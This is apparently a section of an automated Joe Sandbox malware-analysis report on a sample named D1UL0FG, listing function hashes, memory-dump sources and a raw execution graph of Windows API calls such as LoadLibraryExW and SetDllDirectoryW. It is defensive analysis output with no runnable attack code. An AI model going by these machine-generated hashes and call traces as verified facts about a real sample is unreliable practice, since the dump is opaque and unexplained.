                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                          • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                          • Instruction ID: 36159fc43ec5a3f4997be3bbefe2bca9038f51860b30d1743edf442ec718850a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8241C373B28A8585EB609F65E4443BA6760FB88794F404035EE4DC7BA8EF3DD451DB40
                                                                                                                                                                                                                                          Function 00007FF67AEEF628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                          • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                          • Instruction ID: 1effbd518c66fb1945d5406363462a7ac6157f37c9dc05a6e1c250a08e9f3362
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A21F673A2C28282FB20AB11D05427D73B1FB84B44FD58079DA8C876A4DF7CEA45DB81
                                                                                                                                                                                                                                          Function 00007FF67AEDFDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                          • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                          • Instruction ID: 4d21789b438987d9e33a242363f828b8d2f97b24b93566cdc693db9eb449d521
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92113733628B8182EB609B19F400269B7A0FB88B98F684274DE8D47769EF3CC551CB00
                                                                                                                                                                                                                                          Function 00007FF67AEF07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                          • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                          • Instruction ID: 8ca7c61e88d1af83991327eecde94ce22566cad148cb600ab8e4541fe47382c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8018F6393C64386FB60BF60A46627E23A0EF84749F8010BAD54DC66E1EF2CE544EF14

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:2.7%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:1.1%
                                                                                                                                                                                                                                          Total number of Nodes:743
                                                                                                                                                                                                                                          Total number of Limit Nodes:25
                                                                                                                                                                                                                                          execution_graph 75224 7ff8b9108f7c 75225 7ff8b9108fb1 75224->75225 75226 7ff8b9108fc1 75225->75226 75228 7ff8b9109068 75225->75228 75231 7ff8b91090a1 75228->75231 75229 7ff8b91090bd 75229->75226 75231->75229 75232 7ff8b9103e74 5 API calls 75231->75232 75233 7ff8b9104610 WSAGetLastError 75231->75233 75232->75231 75233->75231 74191 7ff8a92f7eb0 74192 7ff8a92e12ee 74191->74192 74193 7ff8a92f7ed0 SetLastError 74192->74193 74194 7ff8a92f7ef7 74193->74194 74197 7ff8a92e1b4a 74194->74197 74195 7ff8a92f7f39 74197->74195 74198 7ff8a92ec410 74197->74198 74200 7ff8a92ec4ef 74198->74200 74204 7ff8a92e195b 74198->74204 74214 7ff8a92e1cf8 74198->74214 74218 7ff8a92e146a 74198->74218 74222 7ff8a9326905 74198->74222 74200->74195 74204->74198 74206 7ff8a92f0120 74204->74206 74205 7ff8a92e1497 SetLastError 74205->74206 74206->74205 74207 7ff8a92f0d72 74206->74207 74213 7ff8a92f0294 74206->74213 74208 7ff8a92f0d7f 00007FF8C6126570 74207->74208 74207->74213 74209 7ff8a92f0da0 00007FF8C6126570 74208->74209 74208->74213 74210 7ff8a92f0dc0 00007FF8C6126570 74209->74210 74209->74213 74211 7ff8a92f0ddb 00007FF8C6126570 74210->74211 74210->74213 74212 7ff8a92f0df3 00007FF8C6126570 74211->74212 74211->74213 74212->74213 74213->74198 74214->74198 74215 7ff8a9326340 74214->74215 74216 7ff8a9326a5f SetLastError 74215->74216 74217 7ff8a9326a73 74215->74217 74216->74217 74217->74198 74218->74198 74219 7ff8a9326220 74218->74219 74220 7ff8a9326a5f SetLastError 74219->74220 74221 7ff8a9326a73 74219->74221 74220->74221 74221->74198 74223 7ff8a932690e 74222->74223 74224 7ff8a9326a5f SetLastError 74223->74224 74225 7ff8a9326a73 74223->74225 74224->74225 74225->74198 74226 7ff8b9108820 74228 7ff8b9108828 74226->74228 74229 7ff8b910886a 74228->74229 74231 7ff8b9104610 WSAGetLastError 74228->74231 74232 7ff8b9103e74 74228->74232 74231->74228 74233 7ff8b9103eb3 74232->74233 74236 7ff8b9103ea8 74232->74236 74238 7ff8b9102490 74233->74238 74235 7ff8b9103f54 74235->74228 74236->74233 74237 7ff8b9103f25 select 74236->74237 74237->74233 74239 7ff8b9102499 74238->74239 74240 7ff8b91024a4 74239->74240 74241 7ff8b91024e4 IsProcessorFeaturePresent 74239->74241 74240->74235 74242 7ff8b91024fc 74241->74242 74245 7ff8b91026d8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 74242->74245 74244 7ff8b910250f 74244->74235 74245->74244 74246 7ff67aedccac 74267 7ff67aedce7c 74246->74267 74249 7ff67aedcdf8 74416 7ff67aedd19c 7 API calls 2 library calls 74249->74416 74250 7ff67aedccc8 __scrt_acquire_startup_lock 74252 7ff67aedce02 74250->74252 74259 7ff67aedcce6 __scrt_release_startup_lock 74250->74259 74417 7ff67aedd19c 7 API calls 2 library calls 74252->74417 74254 7ff67aedcd0b 74255 7ff67aedce0d __FrameHandler3::FrameUnwindToEmptyState 74256 7ff67aedcd91 74273 7ff67aedd2e4 74256->74273 74258 7ff67aedcd96 74276 7ff67aed1000 74258->74276 74259->74254 74259->74256 74413 7ff67aee9b9c 45 API calls 74259->74413 74264 7ff67aedcdb9 74264->74255 74415 7ff67aedd000 7 API calls 74264->74415 74266 7ff67aedcdd0 74266->74254 74268 7ff67aedce84 74267->74268 74269 7ff67aedce90 __scrt_dllmain_crt_thread_attach 74268->74269 74270 7ff67aedce9d 74269->74270 74272 7ff67aedccc0 74269->74272 74270->74272 74418 7ff67aedd8f8 7 API calls 2 library calls 74270->74418 74272->74249 74272->74250 74419 7ff67aefa540 74273->74419 74275 7ff67aedd2fb GetStartupInfoW 74275->74258 74277 7ff67aed1009 74276->74277 74421 7ff67aee54f4 74277->74421 74279 7ff67aed37fb 74428 7ff67aed36b0 74279->74428 74285 7ff67aed391b 74532 7ff67aed45b0 74285->74532 74286 7ff67aed383c 74527 7ff67aed1c80 74286->74527 74290 7ff67aed385b 74500 7ff67aed8a20 74290->74500 74293 7ff67aed396a 74555 7ff67aed2710 54 API calls _log10_special 74293->74555 74295 7ff67aed388e 74304 7ff67aed38bb __std_exception_copy 74295->74304 74531 7ff67aed8b90 40 API calls __std_exception_copy 74295->74531 74297 7ff67aed395d 74298 7ff67aed3962 74297->74298 74299 7ff67aed3984 74297->74299 74551 7ff67aee00bc 74298->74551 74301 7ff67aed1c80 49 API calls 74299->74301 74303 7ff67aed39a3 74301->74303 74309 7ff67aed1950 115 API calls 74303->74309 74305 7ff67aed8a20 14 API calls 74304->74305 74312 7ff67aed38de __std_exception_copy 74304->74312 74305->74312 74307 7ff67aed3a0b 74558 7ff67aed8b90 40 API calls __std_exception_copy 74307->74558 74311 7ff67aed39ce 74309->74311 74310 7ff67aed3a17 74559 7ff67aed8b90 40 API calls __std_exception_copy 74310->74559 74311->74290 74314 7ff67aed39de 74311->74314 74318 7ff67aed390e __std_exception_copy 74312->74318 74557 7ff67aed8b30 40 API calls __std_exception_copy 74312->74557 74556 7ff67aed2710 54 API calls _log10_special 74314->74556 74315 7ff67aed3a23 74560 7ff67aed8b90 40 API calls __std_exception_copy 74315->74560 74319 7ff67aed8a20 14 API calls 74318->74319 74320 7ff67aed3a3b 74319->74320 74321 7ff67aed3a60 __std_exception_copy 74320->74321 74322 7ff67aed3b2f 74320->74322 74335 7ff67aed3aab 74321->74335 74561 7ff67aed8b30 40 API calls __std_exception_copy 74321->74561 74562 7ff67aed2710 54 API calls _log10_special 74322->74562 74325 7ff67aed8a20 14 API calls 74326 7ff67aed3bf4 __std_exception_copy 74325->74326 74327 7ff67aed3d41 74326->74327 74328 7ff67aed3c46 74326->74328 74576 7ff67aed44d0 49 API calls 74327->74576 74329 7ff67aed3cd4 74328->74329 74330 7ff67aed3c50 74328->74330 74333 7ff67aed8a20 14 API calls 74329->74333 74563 7ff67aed90e0 59 API calls _log10_special 74330->74563 74337 7ff67aed3ce0 74333->74337 74334 7ff67aed3d4f 74338 7ff67aed3d65 74334->74338 74339 7ff67aed3d71 74334->74339 74335->74325 74336 7ff67aed3c55 74340 7ff67aed3cb3 74336->74340 74341 7ff67aed3c61 74336->74341 74337->74341 74344 7ff67aed3ced 74337->74344 74577 7ff67aed4620 74338->74577 74343 7ff67aed1c80 49 API calls 74339->74343 74574 7ff67aed8850 86 API calls 2 library calls 74340->74574 74564 7ff67aed2710 54 API calls _log10_special 74341->74564 74355 7ff67aed3d2b __std_exception_copy 74343->74355 74347 7ff67aed1c80 49 API calls 74344->74347 74350 7ff67aed3d0b 74347->74350 74348 7ff67aed3dc4 74513 7ff67aed9400 74348->74513 74349 7ff67aed3cbb 74352 7ff67aed3cbf 74349->74352 74353 7ff67aed3cc8 74349->74353 74354 7ff67aed3d12 74350->74354 74350->74355 74352->74341 74353->74355 74575 7ff67aed2710 54 API calls _log10_special 74354->74575 74355->74348 74356 7ff67aed3da7 SetDllDirectoryW LoadLibraryExW 74355->74356 74356->74348 74357 7ff67aed3dd7 SetDllDirectoryW 74360 7ff67aed3e0a 74357->74360 74405 7ff67aed3e5a 74357->74405 74362 7ff67aed8a20 14 API calls 74360->74362 74361 7ff67aed3808 __std_exception_copy 74565 7ff67aedc5c0 74361->74565 74371 7ff67aed3e16 __std_exception_copy 74362->74371 74363 7ff67aed3ffc 74364 7ff67aed4006 PostMessageW GetMessageW 74363->74364 74365 7ff67aed4029 74363->74365 74364->74365 74518 7ff67aed3360 74365->74518 74366 7ff67aed3f1b 74588 7ff67aed33c0 121 API calls 2 library calls 74366->74588 74368 7ff67aed3f23 74368->74361 74369 7ff67aed3f2b 74368->74369 74589 7ff67aed90c0 LocalFree 74369->74589 74374 7ff67aed3ef2 74371->74374 74378 7ff67aed3e4e 74371->74378 74587 7ff67aed8b30 40 API calls __std_exception_copy 74374->74587 74378->74405 74580 7ff67aed6db0 54 API calls _get_daylight 74378->74580 74381 7ff67aed4043 74591 7ff67aed6fb0 FreeLibrary 74381->74591 74386 7ff67aed404f 74387 7ff67aed3e6c 74581 7ff67aed7330 117 API calls 2 library calls 74387->74581 74391 7ff67aed3e81 74394 7ff67aed3ea2 74391->74394 74407 7ff67aed3e85 74391->74407 74582 7ff67aed6df0 120 API calls _log10_special 74391->74582 74394->74407 74583 7ff67aed71a0 125 API calls 74394->74583 74398 7ff67aed3ee0 74586 7ff67aed6fb0 FreeLibrary 74398->74586 74399 7ff67aed3eb7 74399->74407 74584 7ff67aed74e0 55 API calls 74399->74584 74405->74363 74405->74366 74407->74405 74585 7ff67aed2a50 54 API calls _log10_special 74407->74585 74413->74256 74414 7ff67aedd328 GetModuleHandleW 74414->74264 74415->74266 74416->74252 74417->74255 74418->74272 74420 7ff67aefa530 74419->74420 74420->74275 74420->74420 74424 7ff67aeef4f0 74421->74424 74422 7ff67aeef543 74592 7ff67aeea884 37 API calls 2 library calls 74422->74592 74424->74422 74425 7ff67aeef596 74424->74425 74593 7ff67aeef3c8 71 API calls _fread_nolock 74425->74593 74427 7ff67aeef56c 74427->74279 74594 7ff67aedc8c0 74428->74594 74431 7ff67aed3710 74596 7ff67aed92f0 FindFirstFileExW 74431->74596 74432 7ff67aed36eb GetLastError 74601 7ff67aed2c50 51 API calls _log10_special 74432->74601 74436 7ff67aed3723 74602 7ff67aed9370 CreateFileW GetFinalPathNameByHandleW CloseHandle 74436->74602 74437 7ff67aed377d 74604 7ff67aed94b0 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 74437->74604 74439 7ff67aedc5c0 _log10_special 8 API calls 74442 7ff67aed37b5 74439->74442 74441 7ff67aed378b 74444 7ff67aed3706 74441->74444 74605 7ff67aed2810 49 API calls _log10_special 74441->74605 74442->74361 74450 7ff67aed1950 74442->74450 74443 7ff67aed3730 74445 7ff67aed3734 74443->74445 74446 7ff67aed374c __vcrt_FlsAlloc 74443->74446 74444->74439 74603 7ff67aed2810 49 API calls _log10_special 74445->74603 74446->74437 74449 7ff67aed3745 74449->74444 74451 7ff67aed45b0 108 API calls 74450->74451 74452 7ff67aed1985 74451->74452 74453 7ff67aed1c43 74452->74453 74454 7ff67aed7f80 83 API calls 74452->74454 74455 7ff67aedc5c0 _log10_special 8 API calls 74453->74455 74456 7ff67aed19cb 74454->74456 74457 7ff67aed1c5e 74455->74457 74499 7ff67aed1a03 74456->74499 74606 7ff67aee0744 74456->74606 74457->74285 74457->74286 74459 7ff67aee00bc 74 API calls 74459->74453 74460 7ff67aed19e5 74461 7ff67aed1a08 74460->74461 74462 7ff67aed19e9 74460->74462 74610 7ff67aee040c 74461->74610 74613 7ff67aee4f78 11 API calls _get_daylight 74462->74613 74466 7ff67aed19ee 74614 7ff67aed2910 54 API calls _log10_special 74466->74614 74467 7ff67aed1a45 74473 7ff67aed1a7b 74467->74473 74474 7ff67aed1a5c 74467->74474 74468 7ff67aed1a26 74615 7ff67aee4f78 11 API calls _get_daylight 74468->74615 74471 7ff67aed1a2b 74616 7ff67aed2910 54 API calls _log10_special 74471->74616 74476 7ff67aed1c80 49 API calls 74473->74476 74617 7ff67aee4f78 11 API calls _get_daylight 74474->74617 74477 7ff67aed1a92 74476->74477 74479 7ff67aed1c80 49 API calls 74477->74479 74478 7ff67aed1a61 74618 7ff67aed2910 54 API calls _log10_special 74478->74618 74481 7ff67aed1add 74479->74481 74482 7ff67aee0744 73 API calls 74481->74482 74483 7ff67aed1b01 74482->74483 74484 7ff67aed1b35 74483->74484 74485 7ff67aed1b16 74483->74485 74487 7ff67aee040c _fread_nolock 53 API calls 74484->74487 74619 7ff67aee4f78 11 API calls _get_daylight 74485->74619 74489 7ff67aed1b4a 74487->74489 74488 7ff67aed1b1b 74620 7ff67aed2910 54 API calls _log10_special 74488->74620 74491 7ff67aed1b6f 74489->74491 74492 7ff67aed1b50 74489->74492 74623 7ff67aee0180 37 API calls 2 library calls 74491->74623 74621 7ff67aee4f78 11 API calls _get_daylight 74492->74621 74495 7ff67aed1b55 74622 7ff67aed2910 54 API calls _log10_special 74495->74622 74496 7ff67aed1b89 74496->74499 74624 7ff67aed2710 54 API calls _log10_special 74496->74624 74499->74459 74501 7ff67aed8a2a 74500->74501 74502 7ff67aed9400 2 API calls 74501->74502 74503 7ff67aed8a49 GetEnvironmentVariableW 74502->74503 74504 7ff67aed8ab2 74503->74504 74505 7ff67aed8a66 ExpandEnvironmentStringsW 74503->74505 74506 7ff67aedc5c0 _log10_special 8 API calls 74504->74506 74505->74504 74507 7ff67aed8a88 74505->74507 74508 7ff67aed8ac4 74506->74508 74654 7ff67aed94b0 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 74507->74654 74508->74295 74510 7ff67aed8a9a 74511 7ff67aedc5c0 _log10_special 8 API calls 74510->74511 74512 7ff67aed8aaa 74511->74512 74512->74295 74514 7ff67aed9422 MultiByteToWideChar 74513->74514 74515 7ff67aed9446 74513->74515 74514->74515 74517 7ff67aed945c __std_exception_copy 74514->74517 74516 7ff67aed9463 MultiByteToWideChar 74515->74516 74515->74517 74516->74517 74517->74357 74655 7ff67aed6350 74518->74655 74521 7ff67aed3399 74590 7ff67aed3670 FreeLibrary 74521->74590 74523 7ff67aed3381 74523->74521 74723 7ff67aed6040 74523->74723 74525 7ff67aed338d 74525->74521 74732 7ff67aed61d0 54 API calls 74525->74732 74528 7ff67aed1ca5 74527->74528 74871 7ff67aee49f4 74528->74871 74531->74304 74533 7ff67aed45bc 74532->74533 74534 7ff67aed9400 2 API calls 74533->74534 74535 7ff67aed45e4 74534->74535 74536 7ff67aed9400 2 API calls 74535->74536 74537 7ff67aed45f7 74536->74537 74898 7ff67aee6004 74537->74898 74540 7ff67aedc5c0 _log10_special 8 API calls 74541 7ff67aed392b 74540->74541 74541->74293 74542 7ff67aed7f80 74541->74542 74543 7ff67aed7fa4 74542->74543 74544 7ff67aed807b __std_exception_copy 74543->74544 74545 7ff67aee0744 73 API calls 74543->74545 74544->74297 74546 7ff67aed7fc0 74545->74546 74546->74544 75066 7ff67aee7938 74546->75066 74548 7ff67aed7fd5 74548->74544 74549 7ff67aee0744 73 API calls 74548->74549 74550 7ff67aee040c _fread_nolock 53 API calls 74548->74550 74549->74548 74550->74548 74552 7ff67aee00ec 74551->74552 75082 7ff67aedfe98 74552->75082 74554 7ff67aee0105 74554->74293 74555->74361 74556->74361 74557->74307 74558->74310 74559->74315 74560->74318 74561->74335 74562->74361 74563->74336 74564->74361 74566 7ff67aedc5c9 74565->74566 74567 7ff67aed3ca7 74566->74567 74568 7ff67aedc950 IsProcessorFeaturePresent 74566->74568 74567->74414 74569 7ff67aedc968 74568->74569 75094 7ff67aedcb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 74569->75094 74571 7ff67aedc97b 75095 7ff67aedc910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 74571->75095 74574->74349 74575->74361 74576->74334 74578 7ff67aed1c80 49 API calls 74577->74578 74579 7ff67aed4650 74578->74579 74579->74355 74580->74387 74581->74391 74582->74394 74583->74399 74584->74407 74585->74398 74586->74405 74587->74405 74588->74368 74590->74381 74591->74386 74592->74427 74593->74427 74595 7ff67aed36bc GetModuleFileNameW 74594->74595 74595->74431 74595->74432 74597 7ff67aed932f FindClose 74596->74597 74598 7ff67aed9342 74596->74598 74597->74598 74599 7ff67aedc5c0 _log10_special 8 API calls 74598->74599 74600 7ff67aed371a 74599->74600 74600->74436 74600->74437 74601->74444 74602->74443 74603->74449 74604->74441 74605->74444 74607 7ff67aee0774 74606->74607 74625 7ff67aee04d4 74607->74625 74609 7ff67aee078d 74609->74460 74638 7ff67aee042c 74610->74638 74613->74466 74614->74499 74615->74471 74616->74499 74617->74478 74618->74499 74619->74488 74620->74499 74621->74495 74622->74499 74623->74496 74624->74499 74626 7ff67aee053e 74625->74626 74627 7ff67aee04fe 74625->74627 74626->74627 74629 7ff67aee054a 74626->74629 74637 7ff67aeea884 37 API calls 2 library calls 74627->74637 74636 7ff67aee54dc EnterCriticalSection 74629->74636 74631 7ff67aee0525 74631->74609 74632 7ff67aee054f 74633 7ff67aee0658 71 API calls 74632->74633 74634 7ff67aee0561 74633->74634 74635 7ff67aee54e8 _fread_nolock LeaveCriticalSection 74634->74635 74635->74631 74637->74631 74639 7ff67aee0456 74638->74639 74640 7ff67aed1a20 74638->74640 74639->74640 74641 7ff67aee04a2 74639->74641 74642 7ff67aee0465 memcpy_s 74639->74642 74640->74467 74640->74468 74651 7ff67aee54dc EnterCriticalSection 74641->74651 74652 7ff67aee4f78 11 API calls _get_daylight 74642->74652 74644 7ff67aee04aa 74647 7ff67aee01ac _fread_nolock 51 API calls 74644->74647 74646 7ff67aee047a 74653 7ff67aeea950 37 API calls _invalid_parameter_noinfo 74646->74653 74649 7ff67aee04c1 74647->74649 74650 7ff67aee54e8 _fread_nolock LeaveCriticalSection 74649->74650 74650->74640 74652->74646 74653->74640 74654->74510 74656 7ff67aed6365 74655->74656 74657 7ff67aed1c80 49 API calls 74656->74657 74658 7ff67aed63a1 74657->74658 74659 7ff67aed63aa 74658->74659 74660 7ff67aed63cd 74658->74660 74743 7ff67aed2710 54 API calls _log10_special 74659->74743 74662 7ff67aed4620 49 API calls 74660->74662 74664 7ff67aed63e5 74662->74664 74663 7ff67aed63c3 74668 7ff67aedc5c0 _log10_special 8 API calls 74663->74668 74665 7ff67aed6403 74664->74665 74744 7ff67aed2710 54 API calls _log10_special 74664->74744 74733 7ff67aed4550 74665->74733 74669 7ff67aed336e 74668->74669 74669->74521 74686 7ff67aed64f0 74669->74686 74671 7ff67aed641b 74673 7ff67aed4620 49 API calls 74671->74673 74672 7ff67aed9070 3 API calls 74672->74671 74674 7ff67aed6434 74673->74674 74675 7ff67aed6459 74674->74675 74676 7ff67aed6439 74674->74676 74739 7ff67aed9070 74675->74739 74745 7ff67aed2710 54 API calls _log10_special 74676->74745 74679 7ff67aed6466 74680 7ff67aed6472 74679->74680 74681 7ff67aed64b1 74679->74681 74682 7ff67aed9400 2 API calls 74680->74682 74747 7ff67aed5820 137 API calls 74681->74747 74684 7ff67aed648a GetLastError 74682->74684 74746 7ff67aed2c50 51 API calls _log10_special 74684->74746 74748 7ff67aed53f0 74686->74748 74688 7ff67aed6516 74689 7ff67aed651e 74688->74689 74690 7ff67aed652f 74688->74690 74773 7ff67aed2710 54 API calls _log10_special 74689->74773 74755 7ff67aed4c80 74690->74755 74694 7ff67aed653b 74774 7ff67aed2710 54 API calls _log10_special 74694->74774 74695 7ff67aed654c 74698 7ff67aed655c 74695->74698 74700 7ff67aed656d 74695->74700 74697 7ff67aed652a 74697->74523 74775 7ff67aed2710 54 API calls _log10_special 74698->74775 74701 7ff67aed658c 74700->74701 74702 7ff67aed659d 74700->74702 74776 7ff67aed2710 54 API calls _log10_special 74701->74776 74704 7ff67aed65ac 74702->74704 74705 7ff67aed65bd 74702->74705 74777 7ff67aed2710 54 API calls _log10_special 74704->74777 74759 7ff67aed4d40 74705->74759 74709 7ff67aed65cc 74778 7ff67aed2710 54 API calls _log10_special 74709->74778 74710 7ff67aed65dd 74712 7ff67aed65ec 74710->74712 74713 7ff67aed65fd 74710->74713 74779 7ff67aed2710 54 API calls _log10_special 74712->74779 74715 7ff67aed660f 74713->74715 74717 7ff67aed6620 74713->74717 74780 7ff67aed2710 54 API calls _log10_special 74715->74780 74720 7ff67aed664a 74717->74720 74781 7ff67aee7320 73 API calls 74717->74781 74719 7ff67aed6638 74782 7ff67aee7320 73 API calls 74719->74782 74720->74697 74783 7ff67aed2710 54 API calls _log10_special 74720->74783 74724 7ff67aed6060 74723->74724 74724->74724 74725 7ff67aed6089 74724->74725 74731 7ff67aed60a0 __std_exception_copy 74724->74731 74815 7ff67aed2710 54 API calls _log10_special 74725->74815 74727 7ff67aed6095 74727->74525 74728 7ff67aed61ab 74728->74525 74730 7ff67aed2710 54 API calls 74730->74731 74731->74728 74731->74730 74785 7ff67aed1470 74731->74785 74732->74521 74734 7ff67aed455a 74733->74734 74735 7ff67aed9400 2 API calls 74734->74735 74736 7ff67aed457f 74735->74736 74737 7ff67aedc5c0 _log10_special 8 API calls 74736->74737 74738 7ff67aed45a7 74737->74738 74738->74671 74738->74672 74740 7ff67aed9400 2 API calls 74739->74740 74741 7ff67aed9084 LoadLibraryExW 74740->74741 74742 7ff67aed90a3 __std_exception_copy 74741->74742 74742->74679 74743->74663 74744->74665 74745->74663 74746->74663 74747->74663 74749 7ff67aed541c 74748->74749 74750 7ff67aed5424 74749->74750 74751 7ff67aed55c4 74749->74751 74784 7ff67aee6b14 48 API calls 74749->74784 74750->74688 74752 7ff67aed5787 __std_exception_copy 74751->74752 74753 7ff67aed47c0 47 API calls 74751->74753 74752->74688 74753->74751 74756 7ff67aed4cb0 74755->74756 74757 7ff67aedc5c0 _log10_special 8 API calls 74756->74757 74758 7ff67aed4d1a 74757->74758 74758->74694 74758->74695 74760 7ff67aed4d55 74759->74760 74761 7ff67aed1c80 49 API calls 74760->74761 74762 7ff67aed4da1 74761->74762 74763 7ff67aed1c80 49 API calls 74762->74763 74772 7ff67aed4e23 __std_exception_copy 74762->74772 74764 7ff67aed4de0 74763->74764 74767 7ff67aed9400 2 API calls 74764->74767 74764->74772 74765 7ff67aedc5c0 _log10_special 8 API calls 74766 7ff67aed4e6e 74765->74766 74766->74709 74766->74710 74768 7ff67aed4df6 74767->74768 74769 7ff67aed9400 2 API calls 74768->74769 74770 7ff67aed4e0d 74769->74770 74771 7ff67aed9400 2 API calls 74770->74771 74771->74772 74772->74765 74773->74697 74774->74697 74775->74697 74776->74697 74777->74697 